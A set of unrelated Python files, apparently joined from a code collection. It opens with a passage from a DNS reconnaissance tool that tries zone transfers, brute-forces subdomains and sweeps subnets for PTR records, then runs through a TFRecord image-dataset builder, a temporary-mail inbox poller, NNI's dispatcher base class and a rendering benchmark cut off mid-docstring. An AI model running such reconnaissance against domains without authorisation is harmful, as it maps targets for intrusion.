self.n_scanned = len(self.scanned)
self.items = []
self.subnets = []
self.ptr_unscanned_ip = []
self.ptr_scanned = 0
self.scan_failed = []
class SubFuz():
def __init__(self, domain, config, args, PLUGINS_DIR, CORE_DIR):
self.handler = SIGINT_handler()
signal.signal(signal.SIGINT, self.handler.signal_handler)
self.log = Output(args.log_filename, args.csv_filename, args.quiet)
self.domain = domain.decode('utf-8').encode('idna')
self.throttle = args.z / 1000.0
self.threads = args.t
self.zone = args.zone
self.retry = config['config']['retry']
if args.deep: self.deep_domains = map(unicode.strip, io.open(args.deep, encoding='utf-8', mode='r').readlines())
else: self.deep_domains = config["config"]["deep_domains"]
self.timeout = args.p
if args.dns: self.dns = args.dns
else: self.dns = config['config']['dns_fallback']
if args.protocol: self.protocol = args.protocol
else: self.protocol = config['config']['dns_fallback_protocol']
if args.record: self.record = args.record
else: self.record = config['config']['dns_fallback_record']
self.args = args
self.config = config
# TODO move wildcards to ScanList
self.a_wildcard = self.aaaa_wildcard = self.txt_wildcard = self.mx_wildcard = self.cname_wildcard = []
self.sl = ScanList(args)
# Mutex lock required to avoid issues with multiple threads working on the same object.
self.mutex = Lock()
def dns_server(self):
ns_record = lookup(self.domain, 'NS', self.config['config']['dns_fallback'], self.protocol, self.timeout)
if not ns_record:
ns_record = lookup(".".join(self.domain.split('.')[-2:]), 'NS', self.config['config']['dns_fallback'], self.protocol, self.timeout)
# TODO very ugly way of doing it, https://publicsuffix.org/list/public_suffix_list.dat is on the to-do list
# currently doesn't handle target domain inputs like subdomain.domain.co.uk or similar domains very well yet.
# Grab NS record data
# rdtype 2=NS
nameservers = [x for x in ns_record if x.rdtype == 2]
dns_servers = []
self.log.normal('Name Servers:', True)
if nameservers:
# For every NS record found
for y in nameservers[0]:
dns_server_name = y.target.to_text()
# get DNS server IP
dns_server = lookup(dns_server_name,'A', self.config['config']['dns_fallback'], self.protocol, self.timeout)[0].items[0].to_text()
# Zone transfer
if self.zone:
try:
z = dns.zone.from_xfr(dns.query.xfr(dns_server, self.domain, timeout=10, lifetime=10))
self.log.good('{:40}'.format(dns_server_name) + '{:15}'.format(dns_server) + ' - Zone Transfer allowed.', True)
names = z.nodes.keys()
for n in names:
self.log.normal(z[n].to_text(n), True)
except:
self.log.warn('{:40}'.format(dns_server_name) + '{:15}'.format(dns_server) + ' - Zone Transfer not allowed.', True)
else:
self.log.neutral('{:40}'.format(dns_server_name) + '{:15}'.format(dns_server), True)
# Testing for open TCP and UDP ports for DNS servers, and what type of records are permitted.
# TCP
tans = lookup(self.domain, 'ANY', dns_server, 'TCP', self.timeout)
if tans:
if [x for x in tans if x.rdtype == 1 or x.rdtype == 28 or x.rdtype == 5 or x.rdtype == 15 or x.rdtype == 16]:
dns_servers.append(['TCP', dns_server, 'ANY'])
else:
dns_servers.append(['TCP', dns_server, 'A'])
# UDP
uans = lookup(self.domain, 'ANY', dns_server, 'UDP', self.timeout)
if uans:
if [x for x in uans if x.rdtype == 1 or x.rdtype == 28 or x.rdtype == 5 or x.rdtype == 15 or x.rdtype == 16]:
dns_servers.append(['UDP', dns_server, 'ANY'])
else:
dns_servers.append(['UDP', dns_server, 'A'])
# pick the best type of nameserver and record combination
if not self.args.dns and dns_servers:
a = [i for i in dns_servers if i[0] == 'UDP' and i[2] == 'ANY']
b = [i for i in dns_servers if i[0] == 'TCP' and i[2] == 'ANY']
c = [i for i in dns_servers if i[0] == 'UDP' and i[2] == 'A']
d = [i for i in dns_servers if i[0] == 'TCP' and i[2] == 'A']
if a: # ANY + UDP
self.dns, self.protocol, self.record = a[0][1], a[0][0], a[0][2]
elif b: # ANY + TCP
self.dns, self.protocol, self.record= b[0][1], b[0][0], b[0][2]
elif c: # A + UDP
self.dns, self.protocol, self.record = c[0][1], c[0][0], c[0][2]
elif d: # A + TCP
self.dns, self.protocol, self.record = d[0][1], d[0][0], d[0][2]
override_dns = self.args.dns
override_record = self.args.record
override_protocol = self.args.protocol
if override_record: self.record = override_record
if override_dns: self.dns = override_dns
if override_protocol: self.protocol = override_protocol
self.log.neutral('Using nameserver %s, query type %s over %s' % (self.dns, self.record, self.protocol), True)
def check_wildcard(self, domain_addr):
try:
wildcard = ''.join(random.choice(string.ascii_lowercase) for _ in range(15))
ans = lookup( (wildcard + '.' + domain_addr.encode('utf-8')), self.record, self.dns, self.protocol, self.timeout)
if ans:
wc = False
d = domain_addr.encode('utf-8')
for r in ans:
if r.rdtype == 1: # A RECORD
item = []
for x in r.items:
item.append(x.to_text())
self.a_wildcard += item
self.log.warn('{:40}'.format("Wildcard A record found for %s: " % d) + ", ".join(item), True)
wc = True
if r.rdtype == 5: # CNAME RECORD
item = []
for x in r.items:
item.append(x.to_text())
self.cname_wildcard += item
self.log.warn('{:40}'.format("Wildcard CNAME record found for %s: " % d) + ", ".join(item), True)
wc = True
if r.rdtype == 16: # TXT RECORD
item = []
for x in r.items:
item.append(x.to_text())
self.txt_wildcard += item
self.log.warn('{:40}'.format("Wildcard TXT record found for %s: " % d) + ", ".join(item), True)
wc = True
if r.rdtype == 28: # AAAA RECORD
item = []
for x in r.items:
item.append(x.to_text())
self.aaaa_wildcard += item
self.log.warn('{:40}'.format("Wildcard AAAA record found for %s: " % d) + ", ".join(item), True)
wc = True
if r.rdtype == 15: # MX RECORD
item = []
for x in r.items:
item.append(x.to_text())
self.mx_wildcard += item
self.log.warn('{:40}'.format("Wildcard MX record found for %s: " % d) + ", ".join(item), True)
wc = True
if wc == True: return True
#if not wc:
# return False
except Exception as e:
self.log.fatal(('Wildcard check on %s.' % domain_addr), False)
print (e)
return False
def execute_plugins(self, plugins):
for name, value in self.args._get_kwargs():
for plugin in plugins:
if (value is True or self.args.all) and name is plugin.NAME:
try:
plugin_conf = self.config['plugins'][plugin.NAME]
self.log.good('Executing plugin: %s' % name, True)
subdomains = plugin.execute(self.domain, plugin_conf)
if subdomains:
for d in subdomains:
self.new_targets(d.lower())
except Exception as e:
self.log.fatal(str(e), True)
# TODO: domains causes output clutter that is wildcard related.
def scan(self):
self.log.normal('\n\n{:40}'.format('Domain Name') + '{:8}'.format('Record') + 'Value', True)
self.log.normal('------------------------------------------------------', True)
threads = []
for i in range(self.threads):
t = Thread(target=self.scan_worker)
threads.append(t)
t.start()
while any(t.is_alive() for t in threads):
if sys.stdout.isatty() and not self.args.quiet:
self.log.printer()
total = self.sl.n_unscanned + self.sl.n_scanned
percentage = math.ceil(self.sl.n_scanned+0.0)/total*100
sys.stdout.write("Status: " + col.cyan + "%d/%d " %(self.sl.n_scanned, total) + col.end + "domains tested. "
+ col.brown + "%.2f%%" % percentage + col.end + " done. failed: " + col.red +"%d" %
len([x for x in self.sl.scan_failed if x[1] == self.retry]) + col.end + " \r")
sys.stdout.flush()
time.sleep(0.05)
self.log.printer()
if not self.args.quiet: sys.stdout.write(' ' * 64 + '\n')
return
def append_target(self, subdomain):
try:
if subdomain not in self.sl.scanned and subdomain not in self.sl.unscanned:
self.sl.unscanned.insert(0,subdomain)
self.sl.n_unscanned += 1
except Exception as e:
self.log.fatal(('Inserting target %s.' % subdomain), False)
print e
def new_targets(self, new_domain):
if not self.domain == new_domain.rstrip('.') and self.domain in new_domain:
if not self.check_wildcard(new_domain):
try:
self.mutex.acquire()
subdomain = new_domain.split('.')[0].rstrip('0123456789')
self.append_target(subdomain) # this is here for adding new targets found from plugins
for d in reversed(range(0, 21)):
self.append_target('%s%02d' % (subdomain, d))
self.append_target('%s%d' % (subdomain, d))
for s in self.deep_domains:
self.append_target(s + '.' + subdomain)
except Exception as e:
self.log.fatal(('Adding new target %s, %s' % (new_domain, subdomain)), False)
print (e)
finally:
self.mutex.release()
def parse_record(self, ans, query):
wildcard = False
try:
for r in ans:
if r.rdtype == 1: # A RECORD
d = r.name.to_text().rstrip('.').decode('idna').encode('utf-8')
for x in r.items:
item = x.to_text()
if item in self.a_wildcard:
wildcard = True
else:
self.sl.items.append([d, item])
self.log.log_queue.append('{:40}'.format(d) + '{:8}'.format('A') + '{:10}'.format(item))
self.log.csv_queue.append("%s,A,%s" % (d, item))
if r.rdtype == 5: # CNAME RECORD
d = r.name.to_text().rstrip('.').decode('utf-8').decode('idna')
for x in r.items:
item = x.to_text()
if item in self.cname_wildcard:
wildcard = True
else:
self.sl.items.append([d, item])
self.log.log_queue.append('{:40}'.format(d) + '{:8}'.format('CNAME') + '{:10}'.format(item.rstrip('.')))
self.log.csv_queue.append("%s,CNAME,%s" % (d, item.rstrip('.')))
if r.rdtype == 12: # PTR RECORD
#d = r.name.to_text().rstrip('.').decode('utf-8').decode('idna')
for x in r.items:
item = x.to_text()
if self.domain.split('.')[-2] in item:
if not [y for y in self.sl.items if item.rstrip('.') in y if query in y[1]]:
self.sl.items.append([item, query])
self.log.log_queue.append('{:40}'.format(item.rstrip('.')) + '{:8}'.format('PTR') + '{:10}'.format(query))
self.log.csv_queue.append("%s,PTR,%s" % (item.rstrip('.'), query))
else:
wildcard = True
if r.rdtype == 16: # TXT RECORD
d = r.name.to_text().rstrip('.').decode('utf-8').decode('idna')
for x in r.items:
item = x.to_text()
if item in self.txt_wildcard:
wildcard = True
else:
if [t for t in self.config['config']['txt_record_search'] if t in item]:
self.sl.items.append([d, item])
self.log.log_queue.append('{:40}'.format(d) + '{:8}'.format('TXT') + '{:10}'.format(item))
self.log.csv_queue.append("%s,TXT,%s" % (d, item))
if r.rdtype == 28: # AAAA RECORD
d = r.name.to_text().rstrip('.').decode('utf-8').decode('idna')
for x in r.items:
item = x.to_text()
if item in self.aaaa_wildcard:
wildcard = True
else:
self.sl.items.append([d, item])
self.log.log_queue.append('{:40}'.format(d) + '{:8}'.format('AAAA') + '{:10}'.format(item))
self.log.csv_queue.append("%s,AAAA,%s" % (d, item))
if r.rdtype == 15: # MX RECORD
d = r.name.to_text().rstrip('.').decode('utf-8').decode('idna')
for x in r.items:
item = x.to_text()
if item in self.mx_wildcard:
wildcard = True
else:
self.sl.items.append([d, item])
self.log.log_queue.append('{:40}'.format(d) + '{:8}'.format('MX') + '{:10}'.format(item.split(' ')[1].rstrip('.')))
self.log.csv_queue.append("%s,MX,%s" % (d, item.split(' ')[1].rstrip('.')))
new = ['mail._domainkey', '_dmarc', 'default._domainkey']
for n in new:
if d == self.domain:
self.append_target(n)
else:
self.append_target(n + '.' + d.replace(self.domain, '').strip('.'))
except Exception as e:
self.log.fatal(('Parsing records for: %s with answer %s' % (query, ans)), False)
print (e)
return wildcard
def scan_worker(self):
while True:
if self.handler.SIGINT:
return
self.mutex.acquire()
try:
if self.record is 'PTR':
tests = ['PTR']
self.sl.ptr_scanned += 1
subdomain = self.sl.ptr_unscanned_ip.pop(0)
else:
if self.args.record: tests = [self.record]
elif self.record is 'A': tests = ['A', 'TXT', 'MX']
else: tests = ['ANY']
self.sl.n_scanned += 1
self.sl.n_unscanned -= 1
subdomain = self.sl.unscanned.pop(0)
except:
if len(self.sl.unscanned) is 0:
return
finally:
self.mutex.release()
time.sleep(self.throttle)
# if domain already has been scanned (remove duplicates)
# else, add domain to "scanned" list.
if subdomain in self.sl.scanned:
continue
else:
self.sl.scanned.append(subdomain)
for t in tests:
if self.record is 'PTR':
d = subdomain
else:
d = (subdomain + u'.' + self.domain).lower().lstrip('.')
try:
ans = lookup(d.encode('utf-8'), t, self.dns, self.protocol, self.timeout)
if ans:
wildcard = self.parse_record(ans, d)
if ans and not wildcard and d != self.domain and self.record is not 'PTR':
self.new_targets(d)
self.sl.found.append(d)
elif ans == False and self.record is not 'PTR':
hit = [x for x in self.sl.scan_failed if x[0] == subdomain]
if hit:
z = self.sl.scan_failed.index(hit[0])
self.sl.scan_failed[z][1] += 1
if hit[0][1] > self.retry:
continue
else:
self.sl.scan_failed.append([subdomain, 1])
self.sl.unscanned.insert(0,subdomain)
except Exception as e:
try:
self.log.fatal(('Domain Query failed on %s.' % d), False)
except:
self.log.fatal(('Domain Query failed on %s. (HEX ENCODED)' % d.encode('hex')), False)
# added to in an attempt to resolve a bug related to invalid UTF-8 characters
print (e)
def subnets(self):
# Parse through results and check for similar IP's and assign them to "subnets"
# TODO: For god's sake, I'm hardly able to understand this myself.
for z in self.sl.items:
if re.search("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$", z[1]):
ip = ".".join([z[1].split('.')[i] for i in [0, 1, 2]]) + '.0-255'
hit = [x for x in self.sl.subnets if x[0] == ip]
if hit:
z = self.sl.subnets.index(hit[0])
self.sl.subnets[z][1] += 1
else:
self.sl.subnets.append([ip, 1])
self.sl.subnets.sort()
def ptr_scan(self):
while self.sl.subnets:
subnet = self.sl.subnets.pop(0)
subnet = subnet[0][:subnet[0].rfind('.') + 1]
for i in range(0, 256):
self.sl.ptr_unscanned_ip.append(subnet + str(i))
n_ip = len(self.sl.ptr_unscanned_ip)
if self.args.ptr and n_ip > 0:
self.log.good('Checking PTR records for related subnets', False)
self.record = 'PTR'
threads = []
for i in range(self.threads):
t = Thread(target=self.scan_worker)
threads.append(t)
t.start()
while any(t.is_alive() for t in threads):
if sys.stdout.isatty() and not self.args.quiet:
self.log.printer()
percentage = math.ceil(self.sl.ptr_scanned + 0.0)/n_ip*100
sys.stdout.write("Status: " + col.cyan + "%d/%d " % (self.sl.ptr_scanned, n_ip) + col.end + "IP's tested."
+ col.brown + " %.2f%%" % percentage + col.end + " done. \r")
sys.stdout.flush()
time.sleep(0.05)
# just to ensure everything is out
self.log.printer()
if not self.args.quiet: sys.stdout.write(' ' * 64 + '\n')
def stats(self):
if self.sl.ptr_scanned == 0:
self.log.warn('No PTR records found for %s.' % self.domain, False)
self.log.normal('\n\nA total of %d domains records was found.' % len(self.sl.items), True)
self.subnets()
if self.sl.subnets:
self.log.normal('IP range detected:', True)
for x in self.sl.subnets:
self.log.normal(' %s - %d hits' % (x[0], x[1]), True)
else:
self.log.normal("No subnets was discovered.", True)
if not self.args.quiet: print ("\nDONE")
def close(self):
del(self.log)
def __exit__(self):
self.close()
def __del__(self):
self.close()
|
create_indoors.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_integer('train_shards', 12,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('test_shards', 4,
'Number of shards in test TFRecord files.')
tf.app.flags.DEFINE_string('output_directory', './tfRecords-Indoors-2/',
'Output data directory')
tf.app.flags.DEFINE_integer('num_threads', 4,
'Number of threads to preprocess the images.')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(image_buffer, trainid, filename):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
example = tf.train.Example(features=tf.train.Features(feature={
'image/class/trainid': _int64_feature(trainid),
'image/encoded': _bytes_feature(image_buffer),
'image/filename': _bytes_feature(filename)
}))
return example
def _is2convert(filename):
blacklist = ['laundromat/Laundry_Room.bmp',
'waitingroom/Bistro_3.BMP',
'kindergarden/classroom_north.bmp',
'gym/Gym1.png',
'winecellar/wine_cellar_floor_stone.gif',
'laundromat/Laundry_Room.bmp',
'computerroom/url.gif',
'poolinside/indooPool_Inside.gif',
'library/scotland_library2.png',
'fastfood_restaurant/panther_grill.gif',
'closet/closet_design_lg.gif',
'waitingroom/Bistro_3.BMP',
'gym/Gym2.png',
'nursery/idkidsc0301.png',
'kindergarden/classroom_north.bmp',
'fastfood_restaurant/subway.gif',
'garage/salmon_garage_after.gif',
'waitingroom/deco5.png',
'shoeshop/marky.png',
'buffet/Buffet_Lettuce.gif',
'fastfood_restaurant/melvados.gif',
'computerroom/aula_informatica.gif',
'buffet/Buffet_Set_Up.gif',
'meeting_room/conferencerm2.gif',
'kindergarden/ClassroomLarge.gif',
'fastfood_restaurant/connies.gif',
'greenhouse/1412_mb_file_0a8c5.gif',
'buffet/Buffet_Set_Up_2.gif',
'casino/casino_0338.jpg',
'casino/casino_0336.jpg']
return filename.split('Images/')[-1] in blacklist
class ImageCoder(object):
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that decodes RGB JPEG data.
self._raw_data = tf.placeholder(dtype=tf.string)
self._image_data = tf.image.decode_image(self._raw_data, channels=3)
self._image_data = tf.squeeze(self._image_data) # gif will be [1, height, width, channels]
self._encoded_data = tf.image.encode_jpeg(self._image_data, format='rgb', quality=100)
def re_encode_jpeg(self, image_data):
# since tf1.2, decode_jpeg can decode JPEGs, PNGs, BMPs and non-animated GIFs; so for compatibility,
# re-encoding all of three to jpegs for version < 1.2.
return self._sess.run(self._encoded_data,
feed_dict={self._raw_data: image_data})
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'r') as f:
image_data = f.read()
if _is2convert(filename):
print('Reencoding to JPEG for %s' % filename)
image_data = coder.re_encode_jpeg(image_data)
return image_data
def _process_image_files_batch(coder, thread_index, ranges, name, filenames, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards // num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
image_buffer = _process_image(filename, coder)
example = _convert_to_example(image_buffer, label, filename)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, data_sub):
import glob
def mapping_name_to_label(dir_name):
a = dict()
index = 0
for name in sorted(glob.glob(dir_name + '/*')):
a[name.split('/')[-1]] = index
index += 1
return a
print('Determining list of input files and labels from %s.' % data_dir)
file_list = open(data_dir + data_sub + 'Images.txt').read().split('\n')
file_list.pop()
filenames = []
labels = []
mapping = mapping_name_to_label(data_dir + 'Images')
for filename in file_list:
label = mapping[filename.split('/')[0]]
labels.append(label)
if 'jpg' not in filename:
print(filename)
filenames.append(data_dir + 'Images/' + filename)
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(labels), data_dir))
return filenames, labels
def _process_dataset(name, directory, num_shards):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, labels = _find_image_files(directory, name)
_process_image_files(name, filenames, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.test_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
if os.path.exists(FLAGS.output_directory) is not True:
os.mkdir(FLAGS.output_directory)
dir_name = '/home/jacques/workspace/database/MIT_Indoors_67/'
# Run it!
#_process_dataset('Train', dir_name, FLAGS.train_shards)
_process_dataset('Test', dir_name, FLAGS.test_shards)
if __name__ == '__main__':
tf.app.run()
|
message.py
|
import json
import time
from threading import Thread
class Listen:
listen = False
message_ids = []
def message_list(self):
url = "https://api.mail.tm/messages"
headers = { 'Authorization': 'Bearer ' + self.token }
response = self.session.get(url, headers=headers)
response.raise_for_status()
data = response.json()
return [
msg for i, msg in enumerate(data['hydra:member'])
if data['hydra:member'][i]['id'] not in self.message_ids
]
def message(self, idx):
url = "https://api.mail.tm/messages/" + idx
headers = { 'Authorization': 'Bearer ' + self.token }
response = self.session.get(url, headers=headers)
response.raise_for_status()
return response.json()
def run(self):
while self.listen:
for message in self.message_list():
self.message_ids.append(message['id'])
message = self.message(message['id'])
self.listener(message)
time.sleep(self.interval)
def start(self, listener, interval=3):
if self.listen:
self.stop()
self.listener = listener
self.interval = interval
self.listen = True
# Start listening thread
self.thread = Thread(target=self.run)
self.thread.start()
def stop(self):
self.listen = False
self.thread.join()
|
msg_dispatcher_base.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT
# OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ==================================================================================================
#import json_tricks
import os
import threading
import logging
from multiprocessing.dummy import Pool as ThreadPool
from queue import Queue, Empty
import json_tricks
from .common import init_logger, multi_thread_enabled
from .recoverable import Recoverable
from .protocol import CommandType, receive
init_logger('dispatcher.log')
_logger = logging.getLogger(__name__)
QUEUE_LEN_WARNING_MARK = 20
_worker_fast_exit_on_terminate = True
class MsgDispatcherBase(Recoverable):
def __init__(self):
if multi_thread_enabled():
self.pool = ThreadPool()
self.thread_results = []
else:
self.stopping = False
self.default_command_queue = Queue()
self.assessor_command_queue = Queue()
self.default_worker = threading.Thread(target=self.command_queue_worker, args=(self.default_command_queue,))
self.assessor_worker = threading.Thread(target=self.command_queue_worker, args=(self.assessor_command_queue,))
self.default_worker.start()
self.assessor_worker.start()
self.worker_exceptions = []
def run(self):
"""Run the tuner.
This function will never return unless raise.
"""
_logger.info('Start dispatcher')
mode = os.getenv('NNI_MODE')
if mode == 'resume':
self.load_checkpoint()
while True:
command, data = receive()
if data:
data = json_tricks.loads(data)
if command is None or command is CommandType.Terminate:
break
if multi_thread_enabled():
result = self.pool.map_async(self.process_command_thread, [(command, data)])
self.thread_results.append(result)
if any([thread_result.ready() and not thread_result.successful() for thread_result in self.thread_results]):
_logger.debug('Caught thread exception')
break
else:
self.enqueue_command(command, data)
_logger.info('Dispatcher exiting...')
self.stopping = True
if multi_thread_enabled():
self.pool.close()
self.pool.join()
else:
self.default_worker.join()
self.assessor_worker.join()
_logger.info('Terminated by NNI manager')
def command_queue_worker(self, command_queue):
"""Process commands in command queues.
"""
while True:
try:
# set timeout to ensure self.stopping is checked periodically
command, data = command_queue.get(timeout=3)
try:
self.process_command(command, data)
except Exception as e:
_logger.exception(e)
self.worker_exceptions.append(e)
break
except Empty:
pass
if self.stopping and (_worker_fast_exit_on_terminate or command_queue.empty()):
break
def enqueue_command(self, command, data):
"""Enqueue command into command queues
"""
if command == CommandType.TrialEnd or (command == CommandType.ReportMetricData and data['type'] == 'PERIODICAL'):
self.assessor_command_queue.put((command, data))
else:
self.default_command_queue.put((command, data))
qsize = self.default_command_queue.qsize()
if qsize >= QUEUE_LEN_WARNING_MARK:
_logger.warning('default queue length: %d', qsize)
qsize = self.assessor_command_queue.qsize()
if qsize >= QUEUE_LEN_WARNING_MARK:
_logger.warning('assessor queue length: %d', qsize)
def process_command_thread(self, request):
"""Worker thread to process a command.
"""
command, data = request
if multi_thread_enabled():
try:
self.process_command(command, data)
except Exception as e:
_logger.exception(str(e))
raise
else:
pass
def process_command(self, command, data):
_logger.debug('process_command: command: [{}], data: [{}]'.format(command, data))
command_handlers = {
# Tunner commands:
CommandType.Initialize: self.handle_initialize,
CommandType.RequestTrialJobs: self.handle_request_trial_jobs,
CommandType.UpdateSearchSpace: self.handle_update_search_space,
CommandType.AddCustomizedTrialJob: self.handle_add_customized_trial,
# Tunner/Assessor commands:
CommandType.ReportMetricData: self.handle_report_metric_data,
CommandType.TrialEnd: self.handle_trial_end,
CommandType.Ping: self.handle_ping,
}
if command not in command_handlers:
raise AssertionError('Unsupported command: {}'.format(command))
return command_handlers[command](data)
def handle_ping(self, data):
pass
def handle_initialize(self, data):
raise NotImplementedError('handle_initialize not implemented')
def handle_request_trial_jobs(self, data):
raise NotImplementedError('handle_request_trial_jobs not implemented')
def handle_update_search_space(self, data):
raise NotImplementedError('handle_update_search_space not implemented')
def handle_add_customized_trial(self, data):
raise NotImplementedError('handle_add_customized_trial not implemented')
def handle_report_metric_data(self, data):
raise NotImplementedError('handle_report_metric_data not implemented')
def handle_trial_end(self, data):
raise NotImplementedError('handle_trial_end not implemented')
|
benchmark-rendering-multiprocess.py
|
# Copyright 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
import time
import os
import multiprocessing as mp
import argparse
import sys
import numpy as np
import cv2
from House3D import objrender, create_default_config
from House3D.objrender import Camera, RenderMode
def worker(idx, device, num_iter):
api = objrender.RenderAPI(args.width, args.height, device=device)
api.printContextInfo()
mappingFile = cfg['modelCategoryFile']
colormapFile = cfg['colorFile']
assert os.path.isfile(mappingFile) and os.path.isfile(colormapFile)
api.loadScene(args.obj, mappingFile, colormapFile)
cam = api.getCamera()
start = time.time()
for t in range(num_iter):
if t % 2 == 1:
api.setMode(RenderMode.RGB)
else:
api.setMode(RenderMode.SEMANTIC)
mat = np.array(api.render(), copy=False)
end = time.time()
print("Worker {}, speed {:.3f} fps".format(idx, num_iter / (end - start)))
if __name__ == '__main__':
"""
Usage:
./benchmark-rendering-multiprocess.py path/to/house.obj --num-proc 9 --num-gpu 3
Expected per-process speed with house: 00065ecbdd7300d35ef4328ffe871505, 120x90:
1. Tesla M40, EGL backend, nvidia375.39:
1proc, 1gpu: 690fps
3proc, 1gpu: 500x3fps
5proc, 1gpu: 360x5 should see 99% GPU Utilization here
